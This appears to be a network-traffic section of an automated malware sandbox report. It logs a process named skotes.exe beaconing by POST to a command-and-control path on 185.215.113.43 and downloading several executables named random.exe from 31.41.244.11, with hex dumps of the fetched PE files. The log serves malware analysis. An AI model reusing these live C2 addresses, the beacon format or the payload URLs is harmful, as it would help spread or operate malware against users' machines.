Dec 17, 2024 06:03:09.775698900 CET	1236	IN	Data Raw: 24 3b e5 aa 34 d0 02 fc 82 82 e5 f6 03 83 e7 78 1a fc 70 f9 ea 83 34 d8 f1 d7 a3 f2 03 87 ec b2 b2 36 a4 36 4d 43 39 43 d8 19 67 f0 6c eb 6e 6c a5 03 15 cb b9 44 e3 20 89 11 f3 76 47 23 ea fb 0b 37 08 2c 69 f1 db a6 f1 20 ee 42 69 4a 56 2d a1 2b Data Ascii: $;4xp466MC9CglnlD vG#7,i BiJV-+S\T81#z=2u'i$eH([$@<I#(`?jb~ZGXjPtw+"yinL dV 6#*qoB7K-E
Dec 17, 2024 06:03:09.775857925 CET	224	IN	Data Raw: 24 d8 6c b2 49 34 04 7d bd 31 e3 2e 71 59 cc f1 a1 8c 57 fa 28 2e 73 76 6e cc 04 c5 0c 04 f7 b9 a9 cb f7 8d ca d3 43 90 c6 11 58 48 59 17 19 13 e2 58 7f f3 19 ff 6a 73 9c b7 58 b6 dd bb 1d 04 39 f8 58 d2 91 d2 97 0c 95 87 fe d5 ea 94 25 c9 85 07 Data Ascii: $lI4}1.qYW(.svnCXHYXjsX9X%b<!A8si(d[9_CNDrQ1-AKhwe=7q4Fa2<yPKI[,V\|xGylw;g?3<_=$
Dec 17, 2024 06:03:09.775871992 CET	1236	IN	Data Raw: 79 8c 2e 00 9b 2b f0 cf e8 c7 73 68 2a 65 ed 17 d6 cf e5 64 84 b8 a7 81 81 33 fc c8 97 b1 c1 4c d1 0f 87 14 ad 97 f1 25 0c ac 29 f0 90 9f d2 05 ff 2b e0 91 51 cb ef 23 0d 03 4d 4d 02 ab 00 63 65 a0 d1 79 04 87 fc 20 61 96 07 f4 55 a3 94 33 ce 37 Data Ascii: y.+sh*ed3L%)+Q#MMcey aU370vhia+HFX9\|$`UZFB%ZrlWvsmqw(x(bmeL%PZcL
Dec 17, 2024 06:03:09.775885105 CET	1236	IN	Data Raw: 93 f7 7b 7d c2 c6 33 d8 9a bf 88 5c a4 83 51 79 b8 06 12 2b de 86 e8 c9 48 08 4b 68 50 94 6c 65 fc a7 21 e2 9f bc f3 6b 08 d8 70 7c 99 7c ed 7a 0a b2 10 e3 26 2f f8 d8 63 2c e6 03 a2 a1 f5 52 16 eb 4b 39 42 09 db 7a 95 d0 54 08 9b e6 ff 30 91 ac Data Ascii: {}3\Qy+HKhPle!kp\|\|z&/c,RK9BzT0%ad?kUhlmPBBcn!3SfWp1?!LiIZk1*C2-'X+_R]#G?e&5sCa.0pGK`g
Dec 17, 2024 06:03:09.775899887 CET	448	IN	Data Raw: cc 35 67 c1 41 e8 ad b3 e8 f3 f9 fb 24 ba ec fa d0 ab 95 43 45 dc 2d b3 4b 43 69 d8 28 ec fd fc 0f 2d 04 f2 46 cc b1 80 3e f6 04 ba fb 99 c3 87 78 12 23 e7 37 99 ac 0a 24 55 9f 40 89 2c f4 d7 04 24 ec 4d 44 f2 0e 10 dc e9 5a 76 dd df 6b 82 21 2f Data Ascii: 5gA$CE-KCi(-F>x#7$U@,$MDZvk!/]Lb`\S7>xtM{@:UcyqlHIplCUg.bxeb\z+a`W:2AM*\L/#xX\jC}8A@O7M
Dec 17, 2024 06:03:09.897166014 CET	1236	IN	Data Raw: 11 51 68 02 ac 11 ee e2 89 9e 99 15 89 e3 1b 47 1e fb 04 e4 14 b3 af 89 a1 03 f7 43 23 48 4a 14 3d cd 22 19 16 4b 16 10 09 f3 ef 7c 75 53 88 fa c1 eb 85 da 8b 03 18 5a 75 c4 67 03 bd ae 16 a3 41 93 1f 8b ec 98 34 2f 7f c7 38 d8 39 cc 9f 9f 54 5b Data Ascii: QhGC#HJ="K\|uSZugA4/89T[,W$ne1l*t6{4w%'bOILa$9sOo{_z1BdBL3PDWs``oyAg RDSe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49846	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:15.274230957 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016489001&unit=246122658369
Dec 17, 2024 06:03:16.607348919 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49850	31.41.244.11	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:16.826128960 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 17, 2024 06:03:18.160152912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:17 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 17, 2024 06:03:18.160166979 CET	224	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3
Dec 17, 2024 06:03:18.160217047 CET	1236	IN	Data Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
Dec 17, 2024 06:03:18.160352945 CET	1236	IN	Data Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
Dec 17, 2024 06:03:18.160365105 CET	1236	IN	Data Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34 Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
Dec 17, 2024 06:03:18.160376072 CET	1236	IN	Data Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50 Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv\|=j[j=j[j_EPju@AWSuW
Dec 17, 2024 06:03:18.160496950 CET	896	IN	Data Raw: 00 50 ff 15 34 a1 41 00 85 c0 7e 13 8d 85 58 ff ff ff 50 ff 15 d4 a1 41 00 59 a3 84 e0 41 00 8d 47 01 50 ff b6 bc e0 41 00 57 53 6a 00 ff 35 84 e0 41 00 ff 15 38 a1 41 00 8b 86 bc e0 41 00 5f 5e 5b c9 c3 83 3d b0 e0 41 00 00 74 20 56 be bc e0 41 Data Ascii: P4A~XPAYAGPAWSj5A8AA_^[=At VAtPl&Y~u^U$hAhAhAPlAtMQE38Au0A=At*h@AhAhAPlAt5A%A%Ah`A
Dec 17, 2024 06:03:18.160507917 CET	1236	IN	Data Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83 Data Ascii: ujWPOG;~\|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
Dec 17, 2024 06:03:18.160518885 CET	224	IN	Data Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75 Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]
Dec 17, 2024 06:03:18.160527945 CET	1236	IN	Data Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75 Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
Dec 17, 2024 06:03:18.291758060 CET	1236	IN	Data Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0 Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV\|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EPuuhPhAh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49877	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:27.572994947 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016490001&unit=246122658369
Dec 17, 2024 06:03:28.924222946 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49882	31.41.244.11	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:29.047761917 CET	60	OUT	GET /files/flava/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 17, 2024 06:03:30.374780893 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:30 GMT Content-Type: application/octet-stream Content-Length: 1763328 Last-Modified: Mon, 16 Dec 2024 20:04:16 GMT Connection: keep-alive ETag: "676087c0-1ae800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b5 7d 5e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b4 00 00 00 10 00 00 00 00 00 00 00 a0 45 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 f7 c7 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 00 01 00 69 00 00 00 00 e0 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 01 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PEL}^g0E @ E`Ui T @.rsrct@.idata @ * @fsrfimey@@+<@mhpawist E@.taggant@E"@
Dec 17, 2024 06:03:30.374845982 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.374876976 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.374912024 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.374963999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.374996901 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.375031948 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.375083923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:30.375118017 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: G3e1Z~K8`]gx^ZkhfdDbZfF\A<_i[jaU\CPN%t\9g'$NO`
Dec 17, 2024 06:03:30.375154018 CET	1236	IN	Data Raw: 47 f4 47 45 7d b9 46 6b dd 12 ce 79 1d 2e 51 1a d3 5f 41 45 a5 2e 43 57 57 f0 4d 1a 8c c2 c9 54 5e 09 3c 63 94 dc 56 83 74 a1 b0 d4 60 35 00 67 e3 a2 52 bc 03 bf f1 0f 42 24 14 30 50 34 2b 94 5d 5d d9 0f 6a c4 20 e6 13 7a a2 a8 00 9e 43 6b 60 08 Data Ascii: GGE}Fky.Q_AE.CWWMT^<cVt`5gRB$0P4+]]j zCk`]dAP\|N1%D`7PRf986N0EG-5=}@(0k:;eP{g=WH.\7yP=*t"]Sg`"h{D2km^ND"d_Aj?\i#Zyz]I;/l3Z
Dec 17, 2024 06:03:30.496078014 CET	1236	IN	Data Raw: cd 4c 1e bf bd 60 ce 50 94 da 0b 2d 6e d9 5b d4 44 39 19 5d d5 34 57 5c 0f b9 f0 f8 d2 de 05 90 49 7b 90 1a 97 71 f1 26 49 8e 67 0d f6 23 26 6b f8 df 50 b9 4b c4 2a 55 69 f2 54 ba 5c 5a ec cf a6 bf 56 13 ea b2 6c 36 e9 fc 71 06 19 bb e0 65 bb 05 Data Ascii: L`P-n[D9]4W\I{q&Ig#&kPK*UiT\ZVl6qeC=hUpaRyY#BC'xb\|=jD!D3HeV^C-DsPcXF2f5+Sh~\|TTBzA4%a3{hS@=i4^!\|KdWMt=C<4G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49899	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:35.855036974 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016491001&unit=246122658369
Dec 17, 2024 06:03:37.199486017 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49902	31.41.244.11	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:37.321618080 CET	61	OUT	GET /files/martin/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 17, 2024 06:03:38.647948980 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:38 GMT Content-Type: application/octet-stream Content-Length: 4424704 Last-Modified: Tue, 17 Dec 2024 04:07:24 GMT Connection: keep-alive ETag: "6760f8fc-438400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c9 b4 5f 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e2 47 00 00 84 75 00 00 32 00 00 00 00 c6 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 c6 00 00 04 00 00 a5 ba 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f f0 72 00 73 00 00 00 00 e0 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 e8 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_g(Gu2H@0C@ _rsr r*(@.rsrcr:(@.idata r<(@ 7s>(@gmgvfxzz @(@oqheswup\C@.taggant0"bC@
Dec 17, 2024 06:03:38.648092985 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:38.648130894 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:38.648165941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:38.648200989 CET	896	IN	Data Raw: d6 62 0d 63 be f3 86 29 c8 a5 c5 a4 e5 53 18 cf a9 2c 1a ec 19 ed 46 a4 a4 8e 42 5b f8 5b 3d cb ad 33 e1 34 fe 51 3c 80 ea 39 d1 63 cc 62 13 2d bf 64 a1 00 be ed ff 28 48 32 00 e7 3c 7a ff 49 29 bc 4d bf 20 bf ff 72 e5 54 ab e7 47 76 d6 69 a0 19 Data Ascii: bc)S,FB[[=34Q<9cb-d(H2<zI)M rTGvi1_Flp%@riAY#O,-yD3YeDYA[m &[B\2gEI}&X@zQs%sXeO~J)Oj&X
Dec 17, 2024 06:03:38.648255110 CET	1236	IN	Data Raw: fd a3 16 97 b7 01 2c f3 15 7e c1 0d ce 92 6f cd 46 1d 03 4a 40 da 55 40 3e a6 7c a9 99 d3 5d 6f 71 8c 6e 60 f0 f6 29 81 07 e3 99 74 c5 d0 f1 ef a0 ab 67 83 65 2d f7 7f 56 b2 54 cf 27 8e 03 7a 39 e0 63 c3 4d d6 a5 a2 89 44 b2 a5 40 68 c9 f6 d5 e2 Data Ascii: ,~oFJ@U@>\|]oqn`)tge-VT'z9cMD@hSA%6c`y11U@59>43HO]{HM=E&WIk4?%SRV+(7EOeoUsA- 9`x= \|'s{rG\
Dec 17, 2024 06:03:38.648288965 CET	1236	IN	Data Raw: 44 95 c6 66 f3 42 4f 9a 67 27 8e cb 3a b4 34 60 d2 82 78 a6 27 66 84 a2 ca 23 dc 91 39 55 a0 62 49 d3 f6 86 85 59 80 e2 a0 35 be f7 b2 b7 dc 43 79 37 e6 c0 fa a9 64 01 86 a7 36 da 3e d8 28 91 38 59 73 c7 42 a6 61 18 12 ae fd e6 4a 03 5e 2a d2 71 Data Ascii: DfBOg':4`x'f#9UbIY5Cy7d6>(8YsBaJ^*qh0MM{q]a(<]/$%IMR$(uF;(:$VonXK;i6\mFQH$'1gs?M`4NRCA@wY@2ezq}NT;Rc?P^
Dec 17, 2024 06:03:38.648323059 CET	1236	IN	Data Raw: 1e 9b c4 a3 71 21 b4 c9 1b e4 8b a5 5d de 3d 60 4f b8 df ba c6 73 30 56 22 b7 34 e4 91 dd 7a 39 7e 08 32 ac 2a bd 83 36 65 7a 7f f4 07 0a e9 b5 b6 31 6a 95 13 5f 7a 24 12 56 30 48 45 79 2c 83 c2 d3 40 73 18 e1 8e b5 d3 e4 ab a9 17 61 f1 8e 4b 4d Data Ascii: q!]=`Os0V"4z9~26ez1j_z$V0HEy,@saKM ZC%!\|T!MxC5g'T^{k>2cnzFQ{$[)Mei%;HuKhM0&]4d{!xx;_80ZfU`fI1
